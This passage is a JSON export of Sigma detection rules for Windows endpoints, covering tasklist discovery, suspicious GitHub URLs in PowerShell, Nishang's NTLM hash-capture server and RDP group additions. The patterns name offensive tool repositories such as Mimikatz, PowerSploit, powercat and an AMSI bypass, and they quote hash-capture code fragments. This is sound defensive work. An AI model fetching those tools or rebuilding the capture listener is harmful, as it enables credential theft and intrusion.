"last_update": "2026-03-23T11:45:34.628186Z",
"creation_date": "2026-03-23T11:45:34.628187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628192Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1057/",
"https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/",
"https://attack.mitre.org/software/S0057/"
],
"name": "t1057_tasklist.yml",
"content": "title: Process List Discovered via tasklist.exe\nid: ee92b750-faf4-4136-bc28-a275241bd6d5\ndescription: |\n Detects the execution of tasklist.exe, a tool used to gather detailed information about a computer's active processes.\n Attackers could attempt to get information about running processes on a system to gain an understanding of common software/applications running on systems within the network.\n It is recommended to investigate potential malicious actions taken by tasklist's ancestors and the execution context to determine the legitimacy of this action.\nreferences:\n - https://attack.mitre.org/techniques/T1057/\n - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\n - https://attack.mitre.org/software/S0057/\ndate: 2021/05/17\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1057\n - attack.t1518\n - attack.s0057\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\tasklist.exe'\n # Renamed binaries\n - OriginalFileName: 'tasklist.exe'\n\n selection_tasklist_1:\n - CommandLine:\n - 'tasklist -v'\n - 'tasklist.exe -v'\n # remote computer\n - '* -s *'\n - '* /s *'\n - ParentCommandLine|contains:\n - '|*findstr*lsass'\n - '|*findstr*hurukai'\n - '|*findstr*MsMpEng'\n - '|*findstr*Defender'\n - '/v /FO csv >'\n\n selection_tasklist_2:\n ParentCommandLine:\n - 'cmd.exe /c tasklist'\n - 'cmd.exe /c tasklist.exe'\n - 'cmd.exe /c tasklist/v'\n - 'cmd.exe /c tasklist /v'\n - 'cmd.exe /c tasklist.exe/v'\n - 'cmd.exe /c tasklist.exe /v'\n GrandparentImage|endswith:\n - '\\powershell.exe'\n - '\\wsmprovhost.exe'\n\n selection_tasklist_3:\n IntegrityLevel: 'System'\n Ancestors|contains:\n - '|?:\\Windows\\System32\\winlogon.exe'\n - '|?:\\Windows\\explorer.exe'\n\n selection_injection:\n ParentImage|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n filter_injection:\n - ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\SysWOW64\\sihost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - ParentCommandLine:\n - '?:\\WINDOWS\\system32\\wsmprovhost.exe -Embedding'\n - '?:\\WINDOWS\\SysWOW64\\wsmprovhost.exe -Embedding'\n\n # This is handled by the rule 3c0e776d-a6f9-49d4-b5b9-3d398c13d0ef\n exclusion_svc:\n CommandLine|contains:\n - ' -svc'\n - '/svc' # works with not space between command and argument\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\OpConxps\\MSLSAM\\MSLsam.exe'\n - '?:\\DSS Express\\Server\\DSS Service\\'\n\n exclusion_stanley:\n CommandLine: 'tasklist -v'\n ParentCommandLine|endswith: '\\Stanley\\MobileView\\services\\asset-manager\\tomcat\\bin\\x64\\tomcat?.exe //RS//mv_asset-manager'\n\n exclusion_heidelberg:\n CommandLine: 'tasklist -v'\n GrandparentCommandLine|contains: 'cmd.exe /c ?:\\Program Files (x86)\\Heidelberg\\Backup Toolkit\\'\n\n exclusion_talentia:\n GrandparentCommandLine|startswith: '?:\\Windows\\system32\\cscript.exe *\\Talentia\\IrisMaint\\IrisMaint.vbe '\n\n exclusion_dahua:\n Ancestors|contains: '?:\\DSS Express\\Server\\DSS Service\\DSS_Service.exe'\n\n condition: selection and ((1 of selection_tasklist_*) or (selection_injection and not filter_injection)) and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee92b750-faf4-4136-bc28-a275241bd6d5",
"rule_name": "Process List Discovered via tasklist.exe",
"rule_description": "Detects the execution of tasklist.exe, a tool used to gather detailed information about a computer's active processes.\nAttackers could attempt to get information about running processes on a system to gain an understanding of common software/applications running on systems within the network.\nIt is recommended to investigate potential malicious actions taken by tasklist's ancestors and the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2021-05-17",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1057",
"attack.t1518"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ee931a24-4f65-41b1-8a77-d16972bd8ad7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608593Z",
"creation_date": "2026-03-23T11:45:34.608596Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608604Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_suspicious_urls_script.yml",
"content": "title: Suspicious Code Repository URL in PowerShell Script\nid: ee931a24-4f65-41b1-8a77-d16972bd8ad7\ndescription: |\n Detects the URL of suspicious code repository used to host malicious code/scripts in PowerShell scripts.\n Attackers can host malcious payloads on legitimate websites such as github.com evade network based detections.\n It is recommended to investigate the content that was downloaded by the PowerShell script, and any other malicious actions the script could have taken.\nreferences:\n - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/08/18\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n # generic raw githubusercontent , this is oftently malicious stuff\n - '/raw.githubusercontent.com/'\n # /raw.githubusercontent.com/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n # There is another rule for that\n filter_malicious:\n PowershellCommand|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n\n exclusion_modules:\n PowershellScriptPath|startswith:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\'\n - '?:\\Program Files (x86)\\WindowsPowerShell\\Modules\\'\n\n exclusion_telemetry:\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:*'\n\n exclusion_known_ms:\n PowershellCommand|contains:\n - 'IconUri = ?https://raw.githubusercontent.com/microsoftgraph/msgraph-sdk-powershell/'\n - 'IconUri = ?https://raw.githubusercontent.com/pnp/media/master/optimized/pnp-projects/blue/png/pnp-powershell-300.png'\n - 'IconUri = ?https://raw.githubusercontent.com/powershell/psscriptanalyzer/master/logo.png'\n # C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\pnp.powershell\\pnp.powershell.psd1\n # https://raw.githubusercontent.com/pnp/media/40e7cd8952a9347ea44e5572bb0e49622a102a12/parker/ms/300w/parker-ms-300.png\n - 'IconUri = ?https://raw.githubusercontent.com/pnp/media/*/parker/ms/300w/parker-ms-300.png'\n - 'IconUri = ?https://raw.githubusercontent.com/SharePoint/sp-dev-docs/master/docs/images/sp-logo.png'\n - 'LicenseUri = ?https://raw.githubusercontent.com/Azure/azure-powershell/preview/LICENSE.txt'\n\n exclusion_terminal_icons:\n PowershellScriptPath|endswith: '\\Terminal-Icons.psd1'\n PowershellCommand|contains: 'https://raw.githubusercontent.com/devblackops/Terminal-Icons/master/LICENSE'\n\n exclusion_winscp:\n PowershellScriptPath|endswith: '\\WinSCP.psd1'\n PowershellCommand|contains: 'https://raw.githubusercontent.com/dotps1/WinSCP/master/LICENSE.md'\n\n exclusion_florian:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/Neo23x0/'\n\n exclusion_vmware:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\VMware.VimAutomation.WorkloadManagement\\12.4.0.18627055\\VMware.VimAutomation.WorkloadManagement.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\VMware.VimAutomation.Storage\\12.5.0.19106817\\VMware.VimAutomation.Storage.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\VMware.Sdk.vSphere.vCenter.OVF\\1.0.104.18678708\\VMware.Sdk.vSphere.vCenter.OVF.psd1\n # C:\\Users\\xxx\\OneDrive - xxx\\Documents\\WindowsPowerShell\\Modules\\VMware.VimAutomation.WorkloadManagement\\12.4.0.18627055\\VMware.VimAutomation.WorkloadManagement.psd1\n PowershellCommand|contains: 'https://raw.githubusercontent.com/vmware/PowerCLI-Example-Scripts/'\n\n exclusion_asbuiltreport:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport\\1.0.5\\AsBuiltReport.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Cisco.UcsManager\\0.2.1\\AsBuiltReport.Cisco.UcsManager.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Core\\1.2.0\\AsBuiltReport.Core.psd1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AsBuiltReport.Rubrik.CDM\\1.0.1\\AsBuiltReport.Rubrik.CDM.psd1\n # ...\n PowershellCommand|contains|all:\n - '# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.'\n - '# Tags applied to this module. These help with module discovery in online galleries.'\n - 'https://raw.githubusercontent.com/AsBuiltReport/AsBuiltReport.'\n\n exclusion_pscribo:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\PScribo\\0.9.1\\PScribo.psd1\n PowershellCommand|contains|all:\n - 'PScribo documentation PowerShell module/framework.'\n - 'https://raw.githubusercontent.com/iainbrighton/PScribo/master/LICENSE'\n - 'http://github.com/iainbrighton/PScribo'\n\n exclusion_sharepoint:\n # C:\\Program Files (x86)\\SharePointPnPPowerShell2013\\Modules\\SharePointPnPPowerShell2013\\SharePointPnPPowerShell2013.psd1\n PowershellCommand|contains|all:\n - 'SharePointPnP.PowerShell.20??.Commands.Format.ps1xml'\n - 'https://aka.ms/sppnp'\n - 'https://raw.githubusercontent.com/SharePoint/PnP-PowerShell/master/Commands/Resources/pnp.ico'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-troubleshooters/introduction-to-troubleshootingscript-toolset-tssv2\n exclusion_tssv2:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/microsoft/SDN/master/Kubernetes/windows/debug/collectlogs.ps1\" -Outfile _Kube_collectlogs.ps1'\n PowershellScriptPath|endswith: '\\TSSv2_NET.psm1'\n\n exclusion_psscripttool:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/jdhitsolutions/PSScriptTools'\n PowershellScriptPath:\n - '?:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PSScriptTools\\\\*\\PSScriptTools.psd1'\n - '?:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PSScriptTools\\\\*\\PSScriptTools.ps1'\n\n exclusion_winutil:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/ChrisTitusTech/winutil/'\n\n exclusion_osdeploy:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/OSDeploy/OSD/master/'\n\n exclusion_microsoftteams:\n PowershellCommand|contains:\n - 'LicenseUri=https://raw.githubusercontent.com/MicrosoftDocs/office-docs-powershell/master/teams/LICENSE.txt'\n - \"LicenseUri = 'https://raw.githubusercontent.com/MicrosoftDocs/office-docs-powershell/master/teams/LICENSE.txt'\"\n\n exclusion_joinmodule:\n PowershellCommand|contains: 'https://raw.githubusercontent.com/iRon7/Join-Object/master/Join-Object.png'\n PowershellScriptPath: '*\\WindowsPowerShell\\Modules\\JoinModule\\\\*\\Join.psm1'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcpatchscan.exe'\n\n exclusion_prtg:\n ProcessParentImage: '?:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n PowershellScriptPath|startswith: '?:\\Program Files (x86)\\PRTG Network Monitor\\custom sensors\\'\n\n exclusion_azure1:\n ProcessImage: '?:\\Program Files\\AzureConnectedMachineAgent\\GCArcService2\\GC\\gc_worker.exe'\n PowershellScriptPath: '?:\\ProgramData\\GuestConfig\\Configuration\\AzureWindowsBaseline\\Modules\\Microsoft.OSConfig.Resource\\Helpers\\Microsoft.OSConfig\\Microsoft.OSConfig.psd1'\n exclusion_azure2:\n ProcessAncestors|contains: '|?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe|'\n PowershellScriptPath: '?:\\Packages\\Plugins\\Microsoft.Azure.AzureDefenderForServers.MDE.Windows\\\\*\\MdeExtensionHandler.ps1'\n\n exclusion_ltsvc:\n ProcessParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_mslsam:\n ProcessParentImage: '?:\\Program Files\\OpConxps\\MSLSAM\\1\\MSLsam.exe'\n\n exclusion_psappdeploytoolkit:\n PowershellCommand|contains: 'IconUri = ?https://raw.githubusercontent.com/PSAppDeployToolkit/PSAppDeployToolkit/'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Corporation'\n - 'VMware, Inc.'\n - 'Broadcom Inc'\n - 'Nutanix, Inc.'\n - 'Patch My PC, LLC' # PSAppDeployToolkit\n\n exclusion_legitimate_script:\n PowershellCommand|contains|all:\n - 'ModuleVersion = '\n - 'GUID = '\n - 'Author = '\n\n exclusion_url:\n PowershellCommand|contains:\n - 'https://raw.githubusercontent.com/DFFspace/CryptoBlocker/master/KnownExtensions.txt'\n - 'scoop install https://raw.githubusercontent.com/ScoopInstaller/Main/master/bucket/runat.json'\n - 'https://raw.githubusercontent.com/secureworks/family-of-client-ids-research/main/known-foci-clients.csv'\n - 'https://raw.githubusercontent.com/Romanitho/Winget-AutoUpdate/main/LICENSE'\n - 'https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/'\n - 'https://raw.githubusercontent.com/dotnet/core/refs/heads/main/release-notes/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ee931a24-4f65-41b1-8a77-d16972bd8ad7",
"rule_name": "Suspicious Code Repository URL in PowerShell Script",
"rule_description": "Detects the URL of suspicious code repository used to host malicious code/scripts in PowerShell scripts.\nAttackers can host malcious payloads on legitimate websites such as github.com evade network based detections.\nIt is recommended to investigate the content that was downloaded by the PowerShell script, and any other malicious actions the script could have taken.\n",
"rule_creation_date": "2022-08-18",
"rule_modified_date": "2025-06-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eeafa996-2f93-4255-92a8-ee0893f25649",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084352Z",
"creation_date": "2026-03-23T11:45:34.084354Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084358Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1212/"
],
"name": "t1059_001_powershell_malicious_cmdlet_captureserver_nishang_script.yml",
"content": "title: Malicious PowerShell Nishang Start-CaptureServer\nid: eeafa996-2f93-4255-92a8-ee0893f25649\ndescription: |\n Detects the malicious Start-CaptureServer cmdlet, generally associated with the Nishang framework.\n This script is specifically developed to capture NTLMv2 hashes.\n APT28 (aka Fancy Bear) is known to use a customized version of Nishang's Start-CaptureServer PowerShell script and to transmit the stolen hashes via the mocky API to Mockbin.\n It is recommended to investigate all the PowerShell commands associated with the process, and the parent process for suspicious activities.\nreferences:\n - https://github.com/samratashok/nishang/blob/master/Utility/Start-CaptureServer.ps1\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1212/\ndate: 2023/09/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.t1212\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.ThreatActor.APT28\n - classification.Windows.Framework.Nishang\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '@(0x4e,0x54,0x4c,0x4d,'\n - '$context = $listener.GetContext()'\n - '$NTLMType2Response = ?NTLM ? + [Convert]::ToBase64String($NTLMType2)'\n - '$response.AddHeader(?WWW-Authenticate?, $NTLMType2Response)'\n - '$listener.Stop()'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eeafa996-2f93-4255-92a8-ee0893f25649",
"rule_name": "Malicious PowerShell Nishang Start-CaptureServer",
"rule_description": "Detects the malicious Start-CaptureServer cmdlet, generally associated with the Nishang framework.\nThis script is specifically developed to capture NTLMv2 hashes.\nAPT28 (aka Fancy Bear) is known to use a customized version of Nishang's Start-CaptureServer PowerShell script and to transmit the stolen hashes via the mocky API to Mockbin.\nIt is recommended to investigate all the PowerShell commands associated with the process, and the parent process for suspicious activities.\n",
"rule_creation_date": "2023-09-14",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1212"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eee0e55e-e901-418f-bc61-5d51a8cf1925",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076975Z",
"creation_date": "2026-03-23T11:45:34.076977Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076982Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://serverfault.com/questions/367166/allow-rdp-for-user-from-commandline",
"https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_rdp_user_added.yml",
"content": "title: User Added to RDP Users Group via net.exe\nid: eee0e55e-e901-418f-bc61-5d51a8cf1925\ndescription: |\n Detects RDP permissions being given to a user through the \"net\" utility.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to investigate if the user is expected to be added to this group and to look for other suspicious actions by the parent process.\nreferences:\n - https://serverfault.com/questions/367166/allow-rdp-for-user-from-commandline\n - https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - attack.persistence\n - attack.t1098\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_net:\n OriginalFileName: 'net1.exe'\n CommandLine|contains|all:\n - ' localgroup'\n - ' /add'\n\n selection_group:\n CommandLine|contains:\n - 'Remote Desktop Users'\n - 'Utilisateurs de gestion à distance'\n - 'Utilisateurs du Bureau à distance'\n\n exclusion_ccm:\n 